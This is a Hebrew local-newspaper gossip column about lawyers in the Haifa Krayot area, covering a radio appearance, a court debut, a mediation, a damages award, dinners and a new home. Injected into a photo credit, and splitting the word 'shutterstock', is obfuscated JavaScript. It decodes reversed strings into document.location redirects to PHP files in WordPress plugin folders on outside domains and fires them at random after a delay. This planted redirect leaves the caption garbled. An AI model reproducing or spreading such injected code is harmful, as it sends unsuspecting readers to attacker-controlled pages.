fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הפרקליטים של הד הקריות: משתפים פעולה וחוגגים הישגים

וגם: מי רכש בית חדש? מי נסע עד נצרת בשביל תיק חשוב? מי חגג עם חברים? מי עשתה את צעדיה הראשונים במחוזי ומי עושה לאשתו קניות ביום שישי? עלילות הפרקליטים של הד הקריות
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

העלילות השבועיות של הפרקליטים של הד הקריות

נפגשים ברדיו

עו״ד פולי אברהם, שותפה במשרד עזרא-אברהם ושות׳, אירחה בתוכנית ברדיו "צלילי הקריות" את עו״ד יריב רז, שותף במשרד צבי-רז ושות׳. מי שהאזין, החכים ולמד לא מעט על נושא ההתחדשות העירונית ועל החשיבות של תמ״א 38 ופינוי בינוי. המאזינים קיבלו מענה מקצועי לכל השאלות שנשאלו. היה מוצלח.

תוכנית בנושא התחדשות עירונית. עורכי הדין יריב רז ופולי אברהם | צילומים: יח"צ
תוכנית בנושא התחדשות עירונית. עורכי הדין יריב רז ופולי אברהם | צילומים: יח"צ (מדור הפרקליטים של הד הקריות)

מעמד אישי

הילה פרימור היפהפייה, לשעבר מנהלת מחוז צפון באלו"ט וכיום מתמחה בפרקליטות בחיפה, נצפתה השבוע, כאשר עשתה את צעדיה הראשונים באולמות בית המשפט המחוזי בחיפה, כשייצגה את המדינה בהליך הנוגע למעמד אישי.
הילה, נרשמה התרגשות?
"בכל הנוגע למעמד אישי, בעלי, אור, ואני בקיאים מאוד בנושא ותמיד משתדלים לפעול בו מתוך שליחות כנה ואמיתית". נייס.

מעמד אישי. הילה פרימור | צילום: עצמי
מעמד אישי. הילה פרימור | צילום: עצמי

שיתוף פעולה

שיתוף פעולה מעניין היה השבוע בין עו"ד ומגשרת בדיני משפחה סופי ספקטור ועו"ד רון אביב, העוסק בלשון הרע במסגרת תיק משפחה שלווה בלשון הרע בין בני זוג. מתברר, שיש חיה כזאת.
עו"ד ספקטור, איך היה?
"הגענו עד נצרת, על מנת להביא הצדדים לגישור. המשך יבוא".
המדור ממתין בסבלנות.

לשון הרע. עורכי הדין רון אביב וסופי ספקטור | צילום: עצמי
לשון הרע. עורכי הדין רון אביב וסופי ספקטור | צילום: עצמי

בדרך לקניות

יקיר המדור, עו"ד משה יונאי, מדווח מהשטח: "ביום שישי, בהיותי במשימות 'הוד מלכותה' (רעייתי שתחיה) לבצע 'השלמות' (קניות בסופרמרקט שיש להשלים לקראת השבת), ניצלתי את ההזדמנות לברך את החבר והשותף לדרך, האדריכל המוכשר מיקי אוטמזגין, שמשרדו עבר למתחם כורדני החדש בשדרות ירושלים (מתחם שופרסל). זה שנים רבות שמשרד עורכי הדין רולוף את יונאי עובד בשיתוף פעולה עם אוטמזגין בפרויקטים של בנייה, ובמיוחד בפרויקטים של תמ"א 38. ניתן לומר במלוא הצניעות, כי רוב הפרויקטים בקריות מלווים על ידי שני המשרדים שלנו.
"זו הייתה ההזדמנות להעניק לאוטמזגין תמונה של תמ"א 38, שצילמתי לפני שנתיים בוונציה, שבה רואים זוג ידיים תומכות בבניין ישן, שיסודותיו במים.
"מי שיבקר במשרדו של אוטמזגין מתבקש לוודא כי התמונה מוונציה תלויה על הקיר עם ההקדשה של צוות משרדנו".

תמונה מוונציה. עו"ד משה יונאי והאדריכל מיקי אוטמזגין | צילום: עצמי
תמונה מוונציה. עו"ד משה יונאי והאדריכל מיקי אוטמזגין | צילום: עצמי

סיבה לחגיגה

עו"ד מאור עזרן סיים בימים אלה תיק שבו נפסק פיצוי של מיליון שקלים לנפגע בתאונת דרכים בקריות כולל תקבולי הביטוח הלאומי. ההישג המשפטי הזה היה בהחלט סיבה למסיבה, ועו"ד עזרן הזמין את עורכי הדין השכירים העובדים במשרדו לארוחת צהריים מפנקת. זה בוס זה.

ארוחת צהריים מפנקת לעובדים. עו"ד מאור עזרן | צילום: יניר סלע
ארוחת צהריים מפנקת לעובדים. עו"ד מאור עזרן | צילום: יניר סלע

בשרים ויין

עו״ד אדיר צבי אירח השבוע בביתו כמה חברים לערב מפנק של בשרים ויין. נשנשו עד כלות: עו״ד יריב רז, עו״ד אנה גורביץ׳, עו״ד שי פניני, סגן ראש עיריית חיפה דוד עציוני ואשתו שלי, איש הרשת יבגני זרובינסקי וזוגתו שתחיה מירי סדיק ועוד. למדור נודע שמה שתוכנן להיות מפגש קצר הפך לעשר שעות של פינוקים.

ערב מפנק של בשרים ויין. עו"ד אדיר צבי | צילום: עצמי
ערב מפנק של בשרים ויין. עו"ד אדיר צבי | צילום: עצמי

מבלים על הרכס

עו"ד מתן נחמיאס ניצל את סוף השבוע האחרון לבילוי עם חברים בששון בר על רכס הכרמל. ככה צריך.

בילוי עם חברים. עו"ד מתן נחמיאס | צילום: עצמי
בילוי עם חברים. עו"ד מתן נחמיאס | צילום: עצמי

מברוכ

תגידו מברוכ לעו"ד איתי חסין מקרית חיים שרכש בית חדש ומהמם. שיהיה בשעה טובה וזה.

בית חדש. עו"ד איתי חסין | צילום: עצמי
בית חדש. עו"ד איתי חסין | צילום: עצמי

כיאה לעידן קורונה, עורכי הדין של מחוז חיפה מעבירים בימים אלה הרצאות באמצעים דיגיטליים. המדור ממליץ לקוראיו הנאמנים להיכנס לדף הפייסבוק: לשכת עורכי הדין – מחוז חיפה, יען כי יש שם הרצאות מעניינות בנושאים רבים ומגוונים.

עוד רכילות משפטית כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות